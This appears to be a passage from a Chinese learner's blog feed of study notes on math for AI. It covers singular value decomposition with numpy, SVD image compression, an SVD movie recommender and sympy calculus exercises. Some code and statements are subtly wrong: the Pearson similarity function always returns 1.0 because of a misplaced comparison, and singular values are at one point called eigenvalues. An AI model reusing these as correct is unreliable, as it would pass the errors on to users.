    array([[-0.89442719, -0.70710678],       [ 0.4472136 , -0.70710678]])

    得特征向量$(-\frac{2}{5}\sqrt 5,\frac {1}{5}\sqrt 5)^T$, $(-\frac{1}{2}\sqrt 2, -\frac{1}{2}\sqrt 2)^T$

    6.3 特征值分解

    特征值分解是将矩阵$A$分解成$A=Q\Sigma Q^{-1}$的形式, 要求矩阵必须是 n 维方阵, 将特征值分解算法推广到所有矩阵之上, 就是更加通用的奇异值分解(SVD)

    6.4 奇异值分解(SVD)

    • 这个知识点本科和考研居然没有学过……大概是因为计算量太大了吧

    • 参考教程【学长小课堂】什么是奇异值分解 SVD–SVD 如何分解时空矩阵

    • SVD 可以将任意的矩阵分解为三个矩阵相乘, 简记为$A=U\Sigma V^T$

    • 其中$U$和$V$是正交矩阵, 分别对应$AAT$和$ATA$的特征向量,$\Sigma$是一个对角矩阵, 对角元素为$A$的特征值(按降序排列), 奇异值$^2$=特征值

    • 可以把$A$看作是一个线性变换,将 A 分解为: $U$旋转, $\Sigma$拉伸, $V^T$旋转

    • 奇异值是非负实数

    • 定理:设 A 和 B 是两个矩阵(注意不限定大小,但是必须满足做矩阵积 AB 和 BA 都有意义),则 AB 与 BA 拥有相同的非零特征值,并且保持相同重数,并且属于非零特征值的特征向量间存在制约关系。为什么 A^TA 与 AA^T 有相同特征值?

    $$A _ {m * n} = U _ {m * m}\Sigma _ {m * n}V _ {m * n}^T$$
    $$
    \begin{bmatrix}
    0 & 1\
    1 & 1\
    1 & 0
    \end{bmatrix}=
    \begin{bmatrix}
    1/\sqrt6 & 1/\sqrt2 & 1/\sqrt3\
    2/\sqrt6 & 0 & -1/\sqrt3\
    1/\sqrt6 & -1/\sqrt2 & 1/\sqrt3
    \end{bmatrix}
    \begin{bmatrix}
    \sqrt3 & 0\
    0 & 1\
    0 & 0
    \end{bmatrix}
    \begin{bmatrix}
    1/\sqrt2 & 1/\sqrt2\
    -1/\sqrt2 & 1/\sqrt2
    \end{bmatrix}
    $$

    1
    2
    3
    4
    5
    import numpy as np

    # A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
    A = np.array([[0, 1], [1, 1], [1, 0]]) # https://zhuanlan.zhihu.com/p/29846048
    A
    array([[0, 1],       [1, 1],       [1, 0]])

    使用定义进行 SVD

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    sigmal_val, U = np.linalg.eigh(A.dot(A.T))  # 计算特征值, 左奇异矩阵
    sigmal_sort_id = np.argsort(sigmal_val)[::-1] # 让特征值降序排列
    sigmal_val = np.sort(sigmal_val)[::-1] # 特征值对应的特征向量也对应排序
    U = U[:, sigmal_sort_id] # 左奇异矩阵按这个 id 排序
    sigmal = np.diag(np.sqrt(sigmal_val)) # 计算奇异值矩阵(方阵)
    sigmal_inv = np.linalg.inv(sigmal) # 奇异值矩阵的逆矩阵
    V_part_T = sigmal_inv.dot(U.T).dot(A) # 右奇异矩阵

    print("AAT=:\n", AAT)
    print("左奇异矩阵: \n", U)
    print("奇异值矩阵: \n", np.round(sigmal, 2))
    print("右奇异矩阵的转置(部分):\n", np.round(V_part_T, 6))
    AAT=: [[1 1 0] [1 2 1] [0 1 1]]左奇异矩阵:  [[ 4.08248290e-01 -7.07106781e-01  5.77350269e-01] [ 8.16496581e-01 -7.58447699e-17 -5.77350269e-01] [ 4.08248290e-01  7.07106781e-01  5.77350269e-01]]奇异值矩阵:  [[1.73 0.   0.  ] [0.   1.   0.  ] [0.   0.   0.  ]]右奇异矩阵的转置(部分): [[ 0.707107  0.707107] [ 0.707107 -0.707107] [ 0.        0.      ]]
    1
    np.round(U.dot(sigmal).dot(V_part_T), 2)
    array([[0., 1.],       [1., 1.],       [1., 0.]])

    不研究了, 费劲, 怪不得考研不考, 电脑都鼓捣老半天, 别说手算了

    使用 numpy.linalg.svd 进行 SVD

    1
    2
    3
    4
    5
    6
    7
    U, s, VT = np.linalg.svd(A)
    Sigma = np.zeros(np.shape(A)) # 先创建一个零矩阵
    Sigma[:len(s), :len(s)] = np.diag(s) # 将该矩阵的对角元素替换为奇异值
    print("左奇异矩阵: \n", U)
    print("奇异值:\n", s)
    print("奇异值矩阵: \n", Sigma)
    print("右奇异矩阵的转置:\n", VT)
    左奇异矩阵:  [[-4.08248290e-01  7.07106781e-01  5.77350269e-01] [-8.16496581e-01  5.55111512e-17 -5.77350269e-01] [-4.08248290e-01 -7.07106781e-01  5.77350269e-01]]奇异值: [1.73205081 1.        ]奇异值矩阵:  [[1.73205081 0.        ] [0.         1.        ] [0.         0.        ]]右奇异矩阵的转置: [[-0.70710678 -0.70710678] [-0.70710678  0.70710678]]
    1
    np.round(U.dot(Sigma).dot(VT), 2)
    array([[ 0.,  1.],       [ 1.,  1.],       [ 1., -0.]])

    6.5.4 利用 SVD 进行矩阵近似

    在下述 A 中, SVD 得到的特征值前两项较大(343, 25),最后一项较小(3.37). 通过取不同的 k 值, 分别对应取$U$列, $\Sigma$变成 k 阶方阵,$V^T$取前 k 行, 对比利用矩阵乘积得到的新矩阵与原始数据的情况

    1
    2
    3
    4
    import numpy as np

    A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
    A
    array([[ 1,  5,  7,  6,  1],       [ 2,  1, 10,  4,  4],       [ 3,  6,  7,  5,  2]])
    1
    2
    3
    4
    5
    6
    7
    U, s, VT = np.linalg.svd(A)
    Sigma = np.zeros(np.shape(A)) # 先创建一个零矩阵
    Sigma[:len(s), :len(s)] = np.diag(s) # 将该矩阵的对角元素替换为奇异值

    for k in range(3, 0, -1):
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    print("k=", k, "压缩后的矩阵: \n", np.round(D, 1))
    k= 3 压缩后的矩阵:  [[ 1.  5.  7.  6.  1.] [ 2.  1. 10.  4.  4.] [ 3.  6.  7.  5.  2.]]k= 2 压缩后的矩阵:  [[ 2.   5.4  6.8  5.3  1.5] [ 2.   1.  10.   4.   4. ] [ 2.1  5.7  7.2  5.6  1.5]]k= 1 压缩后的矩阵:  [[1.9 3.8 7.7 4.8 2.3] [2.1 4.1 8.2 5.1 2.4] [2.  4.  8.1 5.  2.4]]

    可以选取合适的 k 值, 保留较大的奇异值和特征向量, 实现用较少的数据量达到较好的矩阵近似效果.

    6.6 综合实例 1 ——利用 SVD 对图像进行压缩

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    from PIL import Image
    import numpy as np
    import matplotlib.pyplot as plt


    def get_approx_SVD1(data, percent):
    """
    SVD 并还原压缩后的数据, 取整体奇异值的百分比
    :param data: 原始矩阵
    :param percent: 奇异值总和百分比
    """
    U, s, VT = np.linalg.svd(data)
    Sigma = np.zeros(np.shape(data))
    Sigma[:len(s), :len(s)] = np.diag(s)
    count = (int)(sum(s)) * percent # 取整体奇异值的百分比
    k = -1 # k 是奇异值总和的百分比的个数
    curSum = 0 # 初始为第一个奇异值
    while curSum <= count: # 当取的奇异值之和 <= 应取得奇异值之和 时:
    k += 1
    curSum += s[k]
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :])) # 取 U 的前 k 列, Sigma 的前 k 阶方阵, VT 的前 k 行
    D[D < 0] = 0 # 钳制颜色范围
    D[D > 255] = 255
    # numpy.rint()将数组的元素四舍五入为最接近的整数
    return np.rint(D).astype("uint8")


    def get_approx_SVD2(data, percent):
    """
    SVD 并还原压缩后的数据, 取奇异值之和的百分比
    :param data: 原始矩阵
    :param percent: 奇异值个数百分比
    """
    U, s, VT = np.linalg.svd(data)
    Sigma = np.zeros(np.shape(data))
    Sigma[:len(s), :len(s)] = np.diag(s)
    k = (int)(percent * len(s)) # 取最大的前 k 个奇异值
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    D[D < 0] = 0
    D[D > 255] = 255
    return np.rint(D).astype("uint8")


    def rebuild_img(filename, p, get_approx_SVD, index):
    """
    导入图像, 进行 SVD 压缩, 并重构图像
    :param filename: 文件名
    :param p: 百分比
    :param get_approx_SVD: 调用的 SVD 筛选方法
    :param index: 显示图像的序号
    """
    img = Image.open(filename, 'r')
    a = np.array(img)
    R0 = a[:, :, 0] # 红色
    G0 = a[:, :, 1] # 绿色
    B0 = a[:, :, 2] # 蓝色
    R = get_approx_SVD(R0, p)
    G = get_approx_SVD(G0, p)
    B = get_approx_SVD(B0, p)
    I = np.stack((R, G, B), 2)

    # 加载图像
    plt.subplot(2, 5, index)
    if get_approx_SVD == get_approx_SVD1:
    plt.title("SVD1 " + str((int)(p * 100)) + '%')
    else:
    plt.title("SVD2 " + str((int)(p * 100)) + '%')
    plt.imshow(I)
    plt.axis('off')


    if __name__ == "__main__":
    filename = "lenna.bmp"
    plt.figure(figsize=(10, 5))
    index = 0
    for p in np.arange(0.2, 1.2, 0.2):
    index += 1
    rebuild_img(filename, p, get_approx_SVD1, index)
    for p in np.arange(0.2, 1.2, 0.2):
    index += 1
    rebuild_img(filename, p, get_approx_SVD2, index)
    plt.show()

    png

    6.7 综合实例 2——利用 SVD 推荐商品

    准备工作,调入相关的库

    1
    2
    3
    4
    import numpy as np
    from numpy import linalg as la
    import pandas as pd
    import time

    1 加载测试数据集,形成 loadExData()函数

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def loadExData():
    """
    行: 代表用户
    列: 代表电影
    值: 代表用户对电影的评分, 0 表示未评分
    :return: 将 csv 转换成的 np.array 数组
    """
    """
    pd.read_csv():
    sep:读取 csv 文件时指定的分隔符,默认为逗号。
    header:设置导入 DataFrame 的列名称(第一行),默认为 "infer"
    """
    return np.array(pd.read_csv("评分.csv", sep=",", header=None))

    2 计算相似度, 形成 ecludSim()欧式距离, pearsSim()皮尔逊相关系数, cosSim() 余弦相似度 三个判断相似度的函数

    • 欧氏距离就是两点间距离公式, 值域为 R

    • 皮尔逊相关系数应该就是概率论与数理统计的那个 r?我记得初中的时候利用计算器的这个 bug 爆机, 值域为[-1, 1]

    • 余弦相似度就是判断两个向量的夹角余弦值, 为 0 就说明两个向量垂直, 不相关, 值域为[-1, 1]

    • 欧氏距离: $dist(\mathbf{X} \cdot \mathbf{Y}) = \left | \mathbf{X} - \mathbf{Y} \right | $

    • 皮尔逊相关系数: $r = \frac{( \mathbf{X-\bar{X}} ) \cdot ( \mathbf{Y-\bar{Y}} )}
      {\left | \mathbf{X-\bar{X}} \right | * \left | \mathbf{Y-\bar{Y}} \right |} $

    • 余弦相似度: $cos\theta = \frac{\mathbf{X} \cdot \mathbf{Y}}{\left | \mathbf{X} \right | * \left | \mathbf{Y} \right |}$

    • 最大最小归一化: $x’ = \frac{x - min(x)}{max(x) - min(x)}$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    """
    以下三种计算方式的参数 X 和 Y 都采用一维数组(向量), 返回的值越接近 1, 相关度越强
    """


    def ecludSim(X, Y):
    """
    利用欧氏距离计算相似度, 并归一化
    """
    return 1.0 / (1.0 + la.norm(X - Y))


    def pearsSim(X, Y):
    """
    利用皮尔逊相关系数计算相似度, 并归一化
    """
    if len(X < 3):
    return 1.0
    else:
    return 0.5 + 0.5 * np.corrcoef(X, Y, rowvar=1)[0][1]


    def cosSim(X, Y):
    """
    利用余弦相似度计算相似度, 并归一化
    """
    return 0.5 + 0.5 * (float(X.dot(Y)) / (la.norm(X) * la.norm(Y)))

    3 对矩阵降维处理, 形成 svd_item()函数

    1. 计算选取的奇异值数目 k 值, 形成 SigmaPct()函数
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    def SigmaPct(sigma, percentage):
    """
    按照前 k 个奇异值的平方和占总奇异值的平方和的百分比 percentage 确定 k 的值
    后续计算 SVD 时需要将 item 原始矩阵降维
    """
    sum_sigma = sum(sigma ** 2)
    sum_sigma1 = sum_sigma * percentage # 求所有奇异值 sigma 的平方和的百分比
    sum_sigma2 = 0
    k = 0
    for i in sigma:
    sum_sigma2 += i * i
    k += 1
    if sum_sigma2 >= sum_sigma1:
    return k
    2. 降维处理, 形成 svd_item()函数
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    def svd_item(data, percentage):
    """
    降维处理
    :return: 降维的物品数据
    """
    n = np.shape(data)[1] # 物品种类数据
    U, s, VT = la.svd(data) # 数据集进行奇异值分解,返回的 s 为对角线上的值
    k = SigmaPct(s, percentage) # 确定了 k 的值,前 k 个已经包含了 percentage 的能力
    Sigma = np.eye(k) * s[:k] # 构建对角矩阵
    # 将数据转换到 k 维空间(低维),构建转换后的物品
    return data.T.dot(U[:, :k].dot(la.inv(Sigma))) # 返回降维的物品数据

    4 在已经降维的数据中, 对用户未打分的一个物品进行评分预测, 形成 svd_predict()函数

    $$ P _ {uj} = \frac {\Sigma _ {i \in item1} W _ {ji} r _ {ui}}{\Sigma _ {i \in item1}W _ {ji}} $$

    • 其中, $P _ {ui}$表示用户$u$对物品$j$的预测值, $item1$代表用户已打分的物品集合, $W _ {ji}$表示物品$j$和物品$i$的相似度, $r _ {ui}$表示用户$u$对物品$i$的打分
    • 该公式的含义: 与用户历史上感兴趣(评分高)的物品(向量)越相似(根据相似度判定算法得出)的物品(向量), 越有可能在用户的推荐列表中获得较高排名.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    def svd_predict(data, user, simMeas, FormedItems, item):
    """
    基于 item 的相似性对用户未评过分的物品进行预测评分
    :param data: 数组矩阵
    :param user: 用户编号
    :param simMeas: 相似度算法
    :param FormedItems: 数组矩阵的行对应用户
    :param item: 列对应物品
    :return: 对物品的预测评分,返回后用于分数的排序
    """
    n = np.shape(data)[1] # 得到数据集中的物品种类数据(各个列)
    Totalsim = 0.0 # 初始化两个评分值
    TotalratSim = 0.0 # 相似性总和变量初始化
    # 遍历给定的用户行中的每个物品
    # 即(对用户评过分的物品进行遍历,并将它与其他物品进行比较),计算相似度
    for j in range(n):
    # 得到给定的用户 user 对商品的评分
    Rating_user = data[user, j]
    # 只对 评价过的商品 和 不是自己的商品 求相似度
    if Rating_user != 0 and j != item:
    # 计算 svd 转换过后矩阵的相似度,物品 item 与物品 j 之间的相似度
    # 相似度的计算方法也会作为一个参数传递给该函数
    Similarity = simMeas(FormedItems[item, :], FormedItems[j, :])
    Totalsim += Similarity # 对相似度不断累加求和
    TotalratSim += Similarity * Rating_user # 对相似度及对应评分值乘积求和
    if Totalsim == 0:
    return 0
    else:
    return TotalratSim / Totalsim # 得到对物品的预测评分,返回后用于分数的排序

    5 产生前 N 个评分值高的物品,返回物品编号以及预测评分值,形成 recommend()函数

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def recommend(data, user, FormedItems, N, simMeas):
    # 为未评价的物品建立一个用户未评分 item 的列表
    unratedItems = np.array(np.nonzero(data[user, :] == 0))[0]
    if len(unratedItems) == 0:
    return "你已评价完所有物品" # 若都已经评过分,则退出
    Scoresitem = []
    for item in unratedItems: # 对未评分的物品 item,都计算其预测评分
    # 计算评价值
    estimatedScore = svd_predict(data, user, simMeas, FormedItems,
    item)
    Scoresitem.append((item, estimatedScore)) # 记录商品及评价值
    Scoresitem = sorted(Scoresitem, key=lambda x: x[1], reverse=True) # 按照得分逆序排序
    return Scoresitem[:N] # 返回前 N 个评分的物品名

    6 对指定用户进行商品推荐,形成 recommend_predict 函数。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    def recommend_predict():
    user_item = loadExData() # 读取数据
    percentage = 0.9 # 奇异值平方和的百分比
    user = 1 # 预测的用户
    n = 4 # 推荐个数
    FormedItems = svd_item(user_item, percentage) # 获得 SVD 降维后的物品

    s_t = time.time()
    simMeas = cosSim # 相似度
    r1 = recommend(user_item, user, FormedItems, n, simMeas)
    print('利用余弦相似度计算距离,进行的奇异值分解推荐:')
    print("按相似度推荐的物品编号为:", r1, "\n 用时:", time.time() - s_t)

    s_t = time.time()
    simMeas = ecludSim
    r2 = recommend(user_item, user, FormedItems, n, simMeas)
    print('利用欧氏距离计算距离,进行的奇异值分解推荐:')
    print("按相似度推荐的物品编号为:", r2, "\n 用时:", time.time() - s_t)

    s_t = time.time()
    simMeas = pearsSim
    r3 = recommend(user_item, user, FormedItems, n, simMeas)
    print('利用皮尔逊相关系数计算距离,进行的奇异值分解推荐:')
    print("按相似度推荐的物品编号为:", r3, "\n 用时:", time.time() - s_t)
    7 调用 recommend_predict()函数,获得结果。
    1
    2
    if __name__ == "__main__":
    recommend_predict()
    利用余弦相似度计算距离,进行的奇异值分解推荐:按相似度推荐的物品编号为:[(1605, 3.7280993014041743), (935, 3.72778748418618), (366, 3.7274892395964807), (812, 3.7260645630753846)] 用时: 1.6344106197357178利用欧氏距离计算距离,进行的奇异值分解推荐:按相似度推荐的物品编号为:[(8, 3.690142726938304), (514, 3.689943318086311), (14, 3.6894721117751406), (172, 3.689287056157151)] 用时: 1.240149736404419利用皮尔逊相关系数计算距离,进行的奇异值分解推荐:按相似度推荐的物品编号为:[(1, 3.7096774193548385), (2, 3.7096774193548385), (3, 3.7096774193548385), (4, 3.7096774193548385)] 用时: 0.8249673843383789

    6.8.2 用户——电影评分矩阵的获取

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import numpy as np
    import pandas as pd

    # 1、读入数据集 header = [用户 id, 电影 id, 评分(取整), 用户提交时间所用秒数]
    header = ["user_id","item_id","rating","timestamp"]
    data = pd.read_csv("u.data", sep="\t", names=header) # 以 csv 文件格式读取 u.data, 分隔符是\t, 列名是 header
    # 2、生成用户—物品评分矩阵
    # 检查是否有重复的用户物品打分记录(数据清洗)
    # data.duplicated() # 返回布尔型数据,告诉重复值的位置
    data.duplicated(subset = ["user_id","item_id"]).sum() # 返回重复值的个数
    item_id_user = data.groupby("item_id").count()["user_id"] # 返回表格(物品 id, 评分用户次数)
    print(item_id_user)
    # 构建用户物品矩阵
    users_num = data.user_id.max() # 选择最大的 id, 可以剔除重复数据
    items_num = data.item_id.max()
    user_item_rating = np.zeros((users_num,items_num))
    for line in data.itertuples(): # itertuples():将 DataFrame 迭代成元组
    # 以元组的方式赋值
    user_item_rating[line[1] - 1, line[2] - 1] = line[3]
    # 生成用户——电影评分矩阵存储成文本文件, 数据为 user_item_rating, 分隔符为,
    np.savetxt("评分 2.csv", user_item_rating, delimiter = ",")
    # 输出 u.data 中的前 5 行内容
    data.head()
    item_id1       4522       1313        904       2095        86       ... 1678      11679      11680      11681      11682      1Name: user_id, Length: 1682, dtype: int64
    user_id item_id rating timestamp
    0 196 242 3 881250949
    1 186 302 3 891717742
    2 22 377 1 878887116
    3 244 51 2 880606923
    4 166 346 1 886397596
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    # 输出 u.data 中的大小
    print("数据集的大小", data.shape)
    # 输出客户数和电影数
    print("客户数 =", users_num)
    print("电影数 =", items_num)
    print("客户数 * 电影数:", users_num * items_num)
    # 查看生成的 user_item_rating 非零元素
    print("user_item_rating 中的非零元素个数", len(user_item_rating.nonzero()[1]))
    print("user_item_rating 中的非零元素", user_item_rating.nonzero()[1])
    # 查看生成的 user_item_rating 矩阵的稀疏性
    sparsity = round(len(user_item_rating.nonzero()[1]) / float(users_num * items_num), 3)
    print("user_item_rating 矩阵的稀疏性:", sparsity)
    print("user_item_rating 矩阵的大小", user_item_rating.shape)
    # 以表格形式显示用户—电影评分表矩阵, 列名为电影, 行名为用户
    pd.DataFrame(user_item_rating)
    数据集的大小 (100000, 4)客户数 = 943电影数 = 1682客户数 * 电影数: 1586126user_item_rating 中的非零元素个数 100000user_item_rating 中的非零元素 [   0    1    2 ... 1187 1227 1329]user_item_rating 矩阵的稀疏性:0.063user_item_rating 矩阵的大小 (943, 1682)
    0 1 2 3 4 5 6 7 8 9 ... 1672 1673 1674 1675 1676 1677 1678 1679 1680 1681
    0 5.0 3.0 4.0 3.0 3.0 5.0 4.0 1.0 5.0 3.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    1 4.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 2.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    3 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    4 4.0 3.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...
    938 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 5.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    939 0.0 0.0 0.0 2.0 0.0 0.0 4.0 5.0 3.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    940 5.0 0.0 0.0 0.0 0.0 0.0 4.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    941 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    942 0.0 5.0 0.0 0.0 0.0 0.0 0.0 0.0 3.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0

    943 rows × 1682 columns

    ]]>
    @@ -10158,7 +10158,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80(2-4)/ - 前言
    • 买了一本迪哥写的《人工智能数学基础》,在掌握了 Python 的基本用法后,着手学习其中的内容
    • 里面很多都是考研数学的内容,让我意识到数学没有想象中的那么“没用”
    • Python 有很多封装好的数学工具,正文中有大量的数学公式使用了 LateX 的语句,参考在线 LaTeX 公式编辑器-编辑器 (latexlive.com),很遗憾没能在本科期间认识到它们
    • 有些 LateX 语句并不能正确地渲染, 先凑合着用吧

    1 基础篇

    2 高等数学基础

    例 2.6 求$\lim_{x \to 1}\frac{x ^ 2 - 1}{x - 1}$ 的极限

    import sympy
    from sympy import oo
    import numpy as np
    x = sympy.Symbol('x')
    f = (x ** 2 - 1) / (x - 1)
    sympy.limit(f, x, 1) # limit(数学表达式 expression, 变量 variable, 要趋向的值 value)

    $\displaystyle 2$

    例 2.11 求$y = arcsin\sqrt{sinx}$的导数

    $y’=\frac{1}{\sqrt{1-sinx} }\cdot\frac{1}{2\sqrt{sinx}}\cdot{cosx}=\frac{cosx}{2\sqrt{sinx-sin^2x}}$

    from sympy import *
    from sympy.abc import x # 导入变量 x
    diff(asin(sqrt(sin(x)))) # diff 求导函数

    $\displaystyle \frac{\cos{\left(x \right)}}{2 \sqrt{1 - \sin{\left(x \right)}} \sqrt{\sin{\left(x \right)}}}$

    例 2.12 求$f(x,y)=x2+3xy+y2$在点$(1,2)$处的偏导数

    $f_{x}(x,y)=2x+3y$

    $f _{y}(x,y)=3x+2y$

    $ f _{x}(1,2)=2x+3y| _{y=2}^{x=1}=8$

    $f _{y}(1,2)=3x+2y| _{y=2}^{x=1}=7$

    from sympy import *
    from sympy.abc import x, y, f
    f = x ** 2 + 3 * x * y + y ** 2
    diff(f, x) # 对 x 求偏导

    $\displaystyle 2 x + 3 y$

    diff(f, y)

    $\displaystyle 3 x + 2 y$

    fx = diff(f, x)
    fx.evalf(subs={x:1, y:2}) # 以字典的形式传入多个变量的值, 返回计算后的数学表达式。

    $\displaystyle 8.0$

    fy = diff(f, y)
    fy.evalf(subs={x:1, y:2})

    $\displaystyle 7.0$

    2.6 方向导数 2.7 梯度

    函数在某点的梯度是一个向量, 它的方向与取得最大方向导数的方向一致

    $gradf(x,y)=\frac{\partial f}{\partial x}\textbf{i}+\frac{\partial f}{\partial y}\textbf{j} $

    $\frac{\partial f}{\partial l}=gradf\cdot \frac{\overrightarrow{l}}{\left | \overrightarrow{l} \right | }$

    用梯度gradf点乘l的单位向量就得到方向导数, 这是计算方向导数最简便的方法

    例 2.15 用 Python 编程实现梯度下降法求解$f(x,y)=x-y+2x2+2xy+y2$的最小值

    使用常规方法:

    $z=x-y+2x2+2xy+y2$

    $z’_{x}=1+4x+2y$

    $z’_{y}=-1+2x+2y$

    求得驻点$(-1,\frac{3}{2})$

    $A=z’'_{xx}| _{y=\frac{3}{2}}^{x=-1}=4$

    $B=z’'_{xy}| _ {y=\frac{3}{2}}^{x=-1}=2$

    $C=z’'_{yy}| _ {y=\frac{3}{2}}^{x=-1}=2$

    $AC-B^2>0$

    $A>0$

    原函数在$(-1,\frac{3}{2})$处具有极小值

    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D
    import numpy as np


    def Fun(x, y): # 原函数
    return x - y + 2 * x * x + 2 * x * y + y * y


    def PxFun(x, y): # 对 x 求偏导
    return 1 + 4 * x + 2 * y


    def PyFun(x, y): # 对 y 求偏导
    return -1 + 2 * x + 2 * y


    if __name__ == "__main__":
    fig = plt.figure() # 创建自定义图象
    # MatplotlibDeprecationWarning: Axes3D(fig) adding itself to the figure is deprecated since 3.4.
    # Pass the keyword argument auto_add_to_figure=False and use fig.add_axes(ax) to suppress this warning.
    # The default value of auto_add_to_figure will change to False in mpl3.5 and True values will no longer work in 3.6.
    ax = Axes3D(fig, auto_add_to_figure=False) # 创建 3D 图象
    fig.add_axes(ax)
    # 在绘制三维图表时, 需要用到 mgrid 函数, 它会返回一个密集的多维网格
    # np.mgrid[开始坐标:结束坐标:步长(步长为复数表示点数,左闭右闭, 步长为实数表示间隔,左闭右开)]
    X, Y = np.mgrid[-2:2:40j, -2:2:40j]
    Z = Fun(X, Y)
    # ax.plot_surface: https://blog.csdn.net/weixin_43584807/article/details/102331755
    # X, Y, Z 2D 数组形式的数据值
    # rstride 数组行距
    # cstride 数组列距
    # cmap 曲面块颜色映射
    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap="rainbow")
    ax.set_xlabel('x') # 设置坐标轴标签
    ax.set_ylabel('y')
    ax.set_zlabel('z')
    # 梯度下降
    step = 0.008 # 取步长
    x = 0 # 初始值
    y = 0
    tag_x = [x] # 绘制图像的列表
    tag_y = [y]
    tag_z = [Fun(x, y)]
    new_x = x
    new_y = y
    Over = False
    while not Over:
    new_x -= step * PxFun(x, y) # 往最大方向减少
    new_y -= step * PyFun(x, y)
    if Fun(x, y) - Fun(new_x, new_y) < 7e-9:
    Over = True
    x = new_x # 更新数据
    y = new_y
    tag_x.append(x) # 添加用于绘制图象的点
    tag_y.append(y)
    tag_z.append(Fun(x, y))
    ax.plot(tag_x, tag_y, tag_z, 'r+]') # 绘制点: 'r'表示红色(好像没有作用?)
    print('(x, y)~(' + str(x) + ',' + str(y) + ')') # 输出结果
    plt.show() # 显示图象

    (x, y)~(-0.9993608094022046,1.498965767887478)

    png

    2.9.5 高手点拨: 求导的三种方式

    已知$f(x)=x5+2x4+3x^2+5$, 求$f’(1)$

    使用 Sympy 的 diff 函数
    import sympy
    from sympy.abc import x, f

    f = x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5
    fx = sympy.diff(f)
    fx.evalf(subs={x:1})

    $\displaystyle 19.0$

    使用 scipy.misc 模块下的 derivative 函数
    import numpy as np
    from scipy.misc import derivative


    def f(x):
    return x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5

    derivative(func=f, x0=1, dx=1e-6, n=1) # 函数为 f, 取值为 1, 间距为 1e-6, 一阶导数
    18.999999999991246
    使用 NumPy 模块里的 poly1d 构造$f(x)$
    import numpy as np

    p = np.poly1d([1, 2, 0, 3, 0, 5]) # 构造多项式
    np.polyder(p, 1)(1.0) # 一阶导数在 x=1.0 时的取值
    19.0
    p.deriv(1)(1.0)  # 一阶导数在 x=1.0 时的取值
    19.0

    2.10 习题

    $lim_{x\to1}sin(lnx)$
    import sympy
    from sympy.abc import x, f

    f = sympy.sin(sympy.log(x))
    sympy.limit(f, x, 1)

    $\displaystyle 0$

    $lim_{x\to8}\frac{\sqrt[3]{x}-2}{x-8}$
    import sympy
    from sympy.abc import x, f

    f = (x ** (1/3) - 2) / (x - 8)
    sympy.limit(f, x, 8)

    $\displaystyle \frac{1}{12}$

    求$y=x4-2x3+5sinx+ln3$的导数
    import sympy
    from sympy.abc import x, y

    y = x ** 4 - 2 * x ** 3 + 5 * sympy.sin(x) + sympy.log(3)
    diff(y)

    $\displaystyle 4 x^{3} - 6 x^{2} + 5 \cos{\left(x \right)}$

    求$z=(3x2+y2)^{4x+2y}$在点$(1,2)$的偏导数

    $lnz=(4x+2y)\cdot ln(3x2+y2)$

